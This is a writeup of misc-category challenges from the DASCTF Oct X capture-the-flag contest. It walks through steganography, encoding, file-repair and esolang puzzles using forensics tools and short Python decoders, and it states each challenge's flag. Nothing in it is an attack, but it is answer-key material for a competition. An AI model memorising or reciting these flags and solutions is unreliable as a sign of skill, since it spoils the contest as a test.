DASCTF Oct X writeup

misc

WELCOME DASCTFxJlenu

Adapted from hsctf's "A Simple Conversation".

#!/usr/bin/env python3
from time import sleep
print("Hello! CTFer!")
sleep(1)
print("Welcome to Dasctf x Jlenu.")
sleep(1)
print("Plz input your name")
age = input("> ")
sleep(1)
print("Wow!")
sleep(1)
print("Hello %s " % age)
sleep(1)
print("Give your gift https://www.youtube.com/watch?v=dQw4w9WgXcQ")

give your flag

Unzip in a loop:

import os
import zipfile

# os.remove('das10/giveyourflag/.DS_Store')
filePath = 'das10/giveyourflag/'
while True:
    # list the files currently in the directory
    filelist = os.listdir(filePath)
    if not filelist:
        break
    for name in filelist:
        zipname = filePath + name
        print(zipname)
        # is it a zip file?
        if zipfile.is_zipfile(zipname):
            # extract into the same directory so the next pass sees the inner archive
            with zipfile.ZipFile(zipname, 'r') as z:
                z.extractall(filePath)
            # delete the zip that was just extracted
            os.remove(zipname)
        else:
            # not a zip: this is the innermost file, print it and stop
            with open(zipname) as f:
                print(f.read())
            raise SystemExit
# R0RWRldJezdnZ3FnbGwzanl1a2RuY3N0aTlpY3BjM2ZlYjB2NW9wfQ==
# base64, then brute-force the Caesar shift
# DASCTF{7ddndii3gvrhakzpqf9fzmz3cby0s5lm}

闯入魔塔的魔法少女 (The Magical Girl Who Broke into the Magic Tower)

Extract with binwalk and search for the flag directly.

魔法少女的迷音 (The Magical Girl's Mysterious Sound)

The archive comment:

nIhtnmTm+m0a+m0a0lA5LIA5LIA5LIA5LIA5LIA5LIA5LIA5LIA5L/CC
atom128

Decoding it with atom128 gives the archive password:

passswowoowowddddddddddddddddddddddddddd

Reversing the audio gives a list of numbers. There is a trap here: what you hear as "151" is actually "100, 51".

100,51,55,97,51,49,53,54,48,98,100,53,100,53,51,100,50,50,48,99,57,97,52,57,50,102,97,153,54,48,49

Decoding the decimal values as ASCII gives the flag:

DASCTF{d37a31560bd5d53d220c9a492fad5601}

魔法秘文 (Magic Cipher Text)

foremost carves an archive out of the image. One file in it is unencrypted, a ttf file; the archive comment hints that the password consists of 32 Chinese characters.
URL-encoded data is found at the end of the ttf file:

二十丁厂七卜人入八九几儿了力乃刀又三于干亏士工土才寸下大丈与万上小口巾山千乞川亿个勺久凡及夕丸么广亡门义之尸弓己已子卫也女飞刃习叉马乡丰王井开夫天无元专云扎艺木五支厅不太犬区历尤友匹车巨牙屯比互切瓦止少日中冈贝内水见午牛手毛气升长仁什片仆化仇币仍仅斤爪反介父从今凶分乏公仓月氏勿欠风丹匀乌凤勾文六方火为斗忆订计户认心尺引丑巴孔队办以允予劝双书幻玉刊示末未击打巧正扑扒功扔去甘世古节本术可丙左厉右石布龙

Install the font; rendering the text with it shows that some of the characters have been rotated.

Pick out the abnormal characters:

丁厂八九几刀于干工上小个门之马王云木尤切少牛分六方丑玉古节可石布

Unzip with them as the password to get the flag:

DASCTF{4b7e33769d9bd2b7dbc1790ae39397b9}

不可以色色 (No Lewd Stuff)

Following the hint leads to a download of video.zip.
Unzip it and compare the file against a normal MP4 header, then repair it; here 0x40 bytes have to be replaced.

Stepping through the video frame by frame yields a QR code.


Rotate the second image by 180 degrees and stitch it onto the first to get a PDF417 code.

Decoding it gives the flag:

DASCTF{8e2d479e26b3093651293f9fa26e3404}

魔法信息 (Magic Message)

Following the TCP stream reveals a zip archive.

Extract it and unzip it to get a PDF; it reports an error when opened. Looking at it in 010 Editor, the flag is in one of the data blocks:

DASCTF{25da50b7993c0db55867a5a51f32f35c}

阴游大师 (Rhythm Game Master)

Unzip the archive and extract the note data:

import json

with open('1634029079.mc', 'r') as fp:
    json1 = json.load(fp)
note = json1['note']
# concatenate the column of every note; the resulting digit string is below
for i in note:
    print(i['column'], end='')
#11111366666622222555554525314372631372324234362423535353536271803535647352356011234235355353553877665563543543354512671267011256235425366424423162365417000068658367847012387111119951214811795651141019510911711510599951039710910195109971151160111141250000000031234610053251245332040404026262621267126712671267126712671267126712671267012301230123567856782344532356235623564444444444172635080808081701782662662660220222436436527845645736413737537526215707406754545423452525258765432107766554433112221212676762323246123455335353357654335535335301246786345325325326342660172462318504536141652723643725325252525252536363636271627162716271627162716245245246317258312612125876248761876234617635623561820324132546352434253226026826272526452736508551735534260463065632660582163806647051446017826713521835105287647163735363528353250364634351354444345434

Extract the data between the "0000" and "00000000" markers and decode it as decimal ASCII to get the flag:

68 65 83 67 84 70 123 87 111 119 95 121 48 117 95 65 114 101 95 109 117 115 105 99 95 103 97 109 101 95 109 97 115 116 011 114 125
DASCTF{Wow_y0u_Are_music_game_mast.r}
# challenge author's mistake: 101 was typed as 011; fix it by hand
DASCTF{Wow_y0u_Are_music_game_master}
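Both the reversed-audio list from 魔法少女的迷音 (where a spoken "153" is really 100 followed by 53) and the digit run between the markers here are decimal ASCII with ambiguous token boundaries. The decoder below is an added example, not code from the writeup: the two inputs are copied from the writeup, the filler digits around the marked run are constructed so that the marker search is exercised, and the greedy rule (take three digits whenever they stay at or below 127) is an assumption that reproduces the author's hand parse, including the "011" typo, which it reports as a suspect position instead of silently dropping.

```python
# Added example: decode decimal ASCII with ambiguous token boundaries.

# Note-column digits: constructed filler around the real run copied from the writeup.
NOTE_DIGITS = (
    "2365417"  # constructed filler before the start marker
    "0000"
    "6865836784701238711111995121481179565114101951091171151059995103971091019510997115116011114125"
    "00000000"
    "31234610053"  # constructed filler after the end marker
)

# Comma-separated values heard from the reversed audio (copied from the writeup).
SPOKEN = ("100,51,55,97,51,49,53,54,48,98,100,53,100,53,51,100,50,50,48,"
          "99,57,97,52,57,50,102,97,153,54,48,49")


def run_between(digits, start="0000", end="00000000"):
    """Return the digit run between the first start marker and the next end marker."""
    i = digits.find(start)
    if i < 0:
        raise ValueError("start marker not found")
    i += len(start)
    j = digits.find(end, i)
    if j < 0:
        raise ValueError("end marker not found")
    return digits[i:j]


def decode_digit_run(run):
    """Greedy decode: take three digits when they form a value <= 127, else two.

    Returns the text and the indices of non-printable characters, which are the
    places where the author's hand-typed data is most likely wrong.
    """
    out, suspect, pos = [], [], 0
    while pos < len(run):
        if pos + 3 <= len(run) and int(run[pos:pos + 3]) <= 127:
            code, pos = int(run[pos:pos + 3]), pos + 3
        else:
            code, pos = int(run[pos:pos + 2]), pos + 2
        if not 32 <= code <= 126:
            suspect.append(len(out))
        out.append(chr(code))
    return "".join(out), suspect


def decode_spoken(values):
    """Spoken '151' is really '100, 51': split any token above 127 into 100 and the rest."""
    chars = []
    for tok in values.split(","):
        v = int(tok)
        if v > 127:
            chars.append(chr(100))
            v -= 100
        chars.append(chr(v))
    return "".join(chars)


if __name__ == "__main__":
    text, suspect = decode_digit_run(run_between(NOTE_DIGITS))
    print(repr(text), "suspect positions:", suspect)
    print(decode_spoken(SPOKEN))
```

Running it prints the flag text with `\x0b` at position 34 (the 011 that should have been 101) and the 32-character hex string from the audio challenge.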

英语不好的魔法少女 (The Magical Girl Whose English Is Bad)

Hidden information is found in the file.

Extract the content.
Decoding the zero-width characters gives the ciphertext:

yjPW8RIz0og8HX3o6BcwTmveeyyEDiCurJNTwPJeY/PMyOhHXYVKPLln6isBRyL0

Many of the words are misspelled, so filter them against a word list. Note that the original hidden file still contains the wide (zero-width) characters, so run it through strings first:

strings stego_text.txt > text.txt
# words from the stego text that are not in the dictionary are the misspelled ones
with open('google-10000-english.txt', 'r') as fs:
    tables = set(line.strip() for line in fs)
with open('text.txt', 'r') as fp:
    data = [line.strip() for line in fp]
for s in data:
    if s and s not in tables:
        print(s)
accuratm
extfnt
biks
equivalens
openev
sendinx
foumula
fecused
journsy
threht
oparational
handbnok
sguthwest

Extract the wrong letters and drop the duplicate characters to get the key:

mfsvxueshang

AES decryption with that key gives the flag:

DASCTF{7rql7tzog7pexynd2z3hxfpg4lyt6sr}

There are QR codes at second 23, frame 24, and at second 52.


Reading the partial information with https://merricx.github.io/qrazybox leads to a project on gitee:
https://gitee.com/snowywar/gege
4444.png contains a URL, and an encrypted zip is carved out of twitter.jpg; unzipping it with the password found there gives the ciphertext:

❯ zsteg 4444.png
imagedata .. file: MIPSEL-BE MIPS-II ECOFF executable not stripped - version 2.1
b1,rgb,lsb,xy .. text: "https://ja.m.wikipedia.org/wiki/%E6%AD%BB\t"
b2,r,msb,xy .. file: PGP Secret Key -
b2,g,lsb,xy .. text: "Cg\t_@E@F"
b2,b,lsb,xy .. text: "ANPv@]Q]"
b2,b,msb,xy .. file: PGP Secret Sub-key -
b3,b,msb,xy .. text: "8fDH\\,@s"
❯ binwalk -e twitter.jpg

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 850 x 623, 8-bit colormap, non-interlaced
180817 0x2C251 Zip archive data, encrypted at least v2.0 to extract, compressed size: 44, uncompressed size: 32, name: flag.txt
180989 0x2C2FD End of Zip archive, footer length: 22
❯ cd _twitter.jpg.extracted
❯ unzip -P "$(echo -n 死|iconv -f utf-8 -t gbk)" 2C251.zip
Archive: 2C251.zip
extracting: flag.txt
❯ cat flag.txt
=6270yFdE0<?@H0=@G60562C=J0v60v6%

rot47 gives the flag:

leaf_Ju5t_know_love_dearly_Ge_GeT
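The two classical-cipher steps in this writeup, the base64-then-Caesar brute force from "give your flag" and the rot47 step here, are small enough to verify end to end. The code below is an added example, not the writeup's own script; the two ciphertexts are copied from the writeup, and the known flag prefix used to pick the right shift is an assumption based on the flag format.

```python
# Added example: base64 + Caesar brute force, and rot47.
import base64

# Copied from the writeup: base64 of a Caesar-shifted flag, and the rot47 ciphertext.
B64_SHIFTED = "R0RWRldJezdnZ3FnbGwzanl1a2RuY3N0aTlpY3BjM2ZlYjB2NW9wfQ=="
ROT47_CT = "=6270yFdE0<?@H0=@G60562C=J0v60v6%"


def caesar_decrypt(text, shift):
    """Shift letters back by `shift`; digits and punctuation are left untouched."""
    out = []
    for c in text:
        if "a" <= c <= "z":
            out.append(chr((ord(c) - 97 - shift) % 26 + 97))
        elif "A" <= c <= "Z":
            out.append(chr((ord(c) - 65 - shift) % 26 + 65))
        else:
            out.append(c)
    return "".join(out)


def brute_caesar(ciphertext, prefix="DASCTF{"):
    """Try all 26 shifts and return (shift, plaintext) for the one with the known prefix."""
    for shift in range(26):
        candidate = caesar_decrypt(ciphertext, shift)
        if candidate.startswith(prefix):
            return shift, candidate
    raise ValueError("no shift produced the expected prefix")


def rot47(text):
    """rot47 rotates the 94 printable ASCII characters 33..126 by 47; it is its own inverse."""
    return "".join(chr(33 + (ord(c) - 33 + 47) % 94) if 33 <= ord(c) <= 126 else c
                   for c in text)


def solve_give_your_flag(b64):
    """Decode the base64 layer, then recover the Caesar shift from the flag prefix."""
    decoded = base64.b64decode(b64).decode()
    return brute_caesar(decoded)


if __name__ == "__main__":
    print(solve_give_your_flag(B64_SHIFTED))   # (3, 'DASCTF{...}')
    print(rot47(ROT47_CT))
```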

虚幻3 (Unreal 3)

from PIL import Image

pic = Image.open('虚幻3.bmp')
a, b = pic.size
r1 = []  # LSB planes of the r, g, b channels, one list per row
g1 = []
b1 = []
r2 = []  # temporary storage for the current row
g2 = []
b2 = []
for y in range(b):
    for x in range(a):
        r2.append(pic.getpixel((x, y))[0] % 2)
        g2.append(pic.getpixel((x, y))[1] % 2)
        b2.append(pic.getpixel((x, y))[2] % 2)
    r1.append(r2)
    g1.append(g2)
    b1.append(b2)
    r2 = []
    g2 = []
    b2 = []
# interleave the three planes row by row into one image three times as tall
pic_1 = Image.new('L', (a, b*3), 255)
for y in range(0, len(r1)*3, 3):
    for x in range(len(r1[0])):
        pic_1.putpixel((x, y), g1[y//3][x] * 255)
        pic_1.putpixel((x, y+1), r1[y//3][x] * 255)
        pic_1.putpixel((x, y+2), b1[y//3][x] * 255)
pic_1.show()
pic_1.save('flag.bmp')


Add the outer finder patterns and scan the code to get the flag:

DASCTF{13833babbd434be3e2882f507ce5f8ae}

Twinkle Twinkle Starry Night

ICAgICArICAgICArICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyoKICAgICAgICArICAqICAgICArKiArICAgICAgIC4gICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAKKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAgICArKiArICAgICAuICAgICArICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICsKKiAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyogKyAuICAgICArICAgICAgICArICAqICAgICAgKyoKICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICsgICAgICAKICArICAqICAgICAgKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICAKKyogICAgICAgLiArICAgLiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyogICAgICAgICsKICAqICAgICArKiArICAgICAgIC4gICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgICsqICAgICAKICAgKyAgKiAgICAgICArKiogKyAgICAgICAuICAgICArICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAgICAgKyoKICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgICsqICsgICAgIC4gICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAKICsqICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICAgKyogICAgICAgICsgICogICAgICArKiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAKICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICArKiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICAKKyAgKiAgICAgKyogICAgICAgICsgICogICAgICAgKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAgICArKiAgICAgICAuICAgICAgIC4gKyAgICAKICAgLiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICArKiAKKiArIC4gICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAKICAgICAgICsgICogICAgICArKiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAKICsgICogICAgICAr
KiAgICAgICAgKyAgKiAgICAgKyogICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAKICAgICsqICAgICAgICArICAqICAgICArKiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyoKICAgICAgICArICAqICAgICAgICsqICAgICAgIC4gICAgICAgLiAgICAgICAuICsgICAuICAgICArICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAKICAgKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAgICArKiArIC4gICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgKyoKICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICsqICsgICAgIC4gICAgICsgICAgICAgICsgICogICAgICAKKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICsqICAgICArICAgICAKICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAgICAgKyogICAgICsgICAgICAgICsgICoKICAgICAgKyogICAgICAgICsgICogICAgICAgKyogICAgICAgICsgICogICAgICAgKyogICAgICAgICsgICogICAgICArKiAgICAgKyAgICAgICAgKyAgKiAgICAKICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICAgICsgICogICAgICsqICAgLiAgIC4gICAuICsgLiAgICAgKyAgICAgICAKICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgICAKKyogKyAgICAgICAuICAgICArICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICAgICsgICogICAKICAgICsqICAgICArICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICArKiAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICArKiAKICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICAgICsgICogICAgICAgKyogICAgICAgICsgICogICAgICsqICAgICAgICAKKyAgKiAgICAgICArKiAgICAgKyAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAKICAgICArKiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICArKiAgICAgICAgKyAgKiAgICAgKyoKICAgICAuICAgICAuICAgICAuICAgICAuICsgICAgIC4gICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAKICAgICArKiAgICAgICAgKyAgKiAgICAg
ICArKiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAKICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICArKiAKICAgICAgICsgICogICAgICsqIC4gLiArICAgLiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAKICArKiAgICAgICAgKyAgKiAgICAgKyogKyAgICAgICAuICAgICArICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICAgKyogICAgICAgICsgICoKICAgICAgKyogICAgICAgICsgICogICAgICArKiogKyAgICAgLiAgICAgKyAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICAgICsKICAqICAgICArKiAgICAgICAgKyAgKiAgICAgKyogKyAgIC4gICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAKICogICAgICAgKyogICAgICAgICsgICogICAgICArKiArICAgICAuICAgICArICAgICAgICArICAqICAgICAgICsqKiArICAgLiAgICAgKyAgICAgICAgKyAgKiAKICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgICsqICAgICAKKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyogICAgICsgICAKICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICAgKyogICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgKyAgICAgICAKICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgICsqICAgICAgIC4gICAgICAgLiAKICAgICAgLiArICAgICAgIC4gICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgKyogICAgICAgICsKICAqICAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICArICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAKICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyogLiArICAgICAgIC4gICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAKICsgICogICAgICsqICAgICAgICArICAqICAgICAgKyogKyAgIC4=
+     +        +  *      +*        +  *     +*        +  *       +*        +  *      +*
+ * +* + . + + * +* + * +* + *
+* + * +* + * +* + . + + * +* + * +
* + * +* + * +* + * +* + . + + * +*
+ * +* + * +* + * +* + * +* +
+ * +* + * +* + * +* + * +* + *
+* . + . + + * +* + * +* + * +* +
* +* + . + + * +* + * +* + * +*
+ * +** + . + + * +* + * +* + * +*
+ * +* + * +* + . + + * +* + *
+* + * +* + * +* + * +* + + * +*
+ * +* + * +* + * +* + + * +*
+ * +* + * +* + * +* + * +* . . +
. + + * +* + * +* + * +* + * +*
* + . + + * +* + * +* + * +* + * +*
+ * +* + + * +* + * +* + * +*
+ * +* + * +* + + * +* + * +* + *
+* + * +* + + * +* + * +* + * +*
+ * +* . . . + . + + * +* + *
+* + * +* + * +* + . + + * +* + * +*
+ * +* + * +* + * +* + . + + *
+* + * +* + * +* + * +* + * +* +
+ * +* + * +* + * +* + * +* + + *
+* + * +* + * +* + * +* + + *
+* + * +* + * +* + * +* . . . + . +
+ * +* + * +* + * +* + * +* + *
+* + . + + * +* + * +* + * +* + *
+* + + * +* + * +* + * +* + * +*
+ + * +* + * +* + * +* + * +*
+ * +* + + * +* + * +* + * +* + *
+* + + * +* + * +* + * +* + * +*
. . . . + . + + * +* + * +* + *
+* + * +* + + * +* + * +* + *
+* + * +* + + * +* + * +* + * +*
+ * +* . . + . + + * +* + * +* + *
+* + * +* + . + + * +* + * +* + *
+* + * +** + . + + * +* + * +* +
* +* + * +* + . + + * +* + * +* +
* +* + * +* + . + + * +** + . + + *
+* + * +* + * +* + * +* + * +*
+ + * +* + * +* + * +* + * +* +
+ * +* + * +* + * +* + * +* +
+ * +* + * +* + * +* + * +* . .
. + . + + * +* + * +* + * +* +
* +* + * +* + + * +* + * +* + *
+* + * +* + * +* . + . + + * +*
+ * +* + * +* + .

This is the Starry esoteric language. The number of spaces before each + * . character selects the operation, so first convert it to readable stack instructions:

import sys

fp = open('Twinkle.txt')
data = fp.read()
fs = open('TwinkleTwinkle.txt', 'w')
sub = 0  # number of spaces seen since the last instruction character
for i in data:
    # print(i)
    if i == '\n':
        continue
    elif i == ' ':
        sub += 1
    elif i == '+':
        # '+': 1 space = dup, 2 = swap, 3 = rotate, 4 = pop, n >= 5 = push n-5
        if sub == 1:
            fs.write('dup\n')
            sub = 0
        elif sub == 2:
            fs.write('swap\n')
            sub = 0
        elif sub == 3:
            fs.write('rotate\n')
            sub = 0
        elif sub == 4:
            fs.write('pop\n')
            sub = 0
        else:
            fs.write('push ' + str(sub-5) + '\n')
            sub = 0
    elif i == '*':
        # '*': 0 spaces = +, 1 = -, 2 = *, 3 = /, 4 = %
        if sub == 0:
            fs.write('+\n')
            sub = 0
        elif sub == 1:
            fs.write('-\n')
            sub = 0
        elif sub == 2:
            fs.write('*\n')
            sub = 0
        elif sub == 3:
            fs.write('/\n')
            sub = 0
        elif sub == 4:
            fs.write('%\n')
            sub = 0
        else:
            print('error!!!')
            sub = 0
            sys.exit()
    elif i == '.':
        # '.': 0 spaces = print as number, otherwise print as character
        if sub == 0:
            fs.write('num_out\n')
        else:
            fs.write('char_out\n')
        sub = 0
    else:
        print('error!!!!')
        sys.exit()
fp.close()
fs.close()

This gives:

push 0
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 0
+
+
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 1
+
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 0
+
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 1
+
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 1
+
push 0
push 3
*
push 1
+
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 0
+
push 3
*
push 0
+
char_out
char_out
char_out
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 2
+
push 3
*
push 0
+
dup
char_out
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 3
*
push 1
+
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 2
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 2
+
push 3
*
push 1
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 2
+
push 3
*
push 2
+
char_out
char_out
char_out
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 1
+
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 2
+
+
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 0
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 2
+
char_out
char_out
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 2
+
push 3
*
push 0
+
+
dup
char_out
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 3
*
push 2
+
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 0
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 2
+
push 3
*
push 1
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 0
+
char_out
char_out
char_out
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 2
+
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 3
*
push 0
+
char_out
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 2
+
push 3
*
push 1
+
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 3
*
push 0
+
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 1
+
push 3
*
push 0
+
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 3
*
push 2
+
char_out
char_out
char_out
char_out
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 2
+
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 3
*
push 2
+
char_out
char_out
dup
char_out
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 3
*
push 1
+
dup
char_out
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 3
*
push 1
+
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 0
+
char_out
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 0
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 1
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 2
+
push 3
*
push 2
+
char_out
char_out
dup
char_out
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 1
+
push 3
*
push 0
+
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 2
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 0
+
char_out
char_out
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 1
+
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 2
+
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 1
+
-
dup
char_out

Then run the stack instructions with a script:

import sys

fp = open('TwinkleTwinkle.txt', 'r')
data = []  # the stack
for line in fp:
    line = line.strip('\n')
    if line[:4] == 'push':
        data.append(int(line.split()[1]))
    elif line in ('+', '-', '*', '/', '%'):
        # binary ops: y is the top of the stack, x the element below it
        y = data.pop()
        x = data.pop()
        data.append({'+': x + y, '-': x - y, '*': x * y, '/': x // y, '%': x % y}[line])
    elif line == 'dup':
        data.append(data[-1])
    elif line == 'swap':
        data[-1], data[-2] = data[-2], data[-1]
    elif line == 'pop':
        data.pop()
    elif line == 'char_out':
        # print the code point as decimal; the flag is decoded from these afterwards
        x = data.pop()
        print(str(x) + ' ', end='')
